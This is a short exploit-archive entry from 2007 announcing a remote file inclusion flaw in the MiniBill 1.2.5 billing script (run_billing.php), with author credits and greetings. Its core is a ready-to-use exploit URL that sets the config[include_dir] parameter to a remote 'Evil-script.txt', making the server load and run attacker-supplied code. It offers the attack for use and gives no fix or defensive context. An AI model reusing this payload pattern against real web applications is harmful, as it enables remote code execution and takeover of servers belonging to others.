MiniBill 1.2.5 (run_billing.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MiniBill 1.2.5 (run_billing.php) Remote File Inclusion Vulnerability
# Published : 2007-06-18
# Author : Abo0od
# Previous Title : Solar Empire <= 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit
# Next Title : YourFreeScreamer 1.0 (serverPath) Remote File Inclusion Vulnerability

=======================================================
MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
=======================================================
Found By : Abo0od , abod@islam-attack.com
=======================================================
Homepage: http://www.hack-teach.org/cc
=======================================================
Script Site : http://www.ultrize.com/minibill/index.php?page=download
=======================================================
File: /crontab/run_billing.php <= $config['include_dir']
========================================================
Exploit:
site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
=======================================================
greets to : www.islam-attack.com
=======================================================

# www.Syue.com [2007-06-18]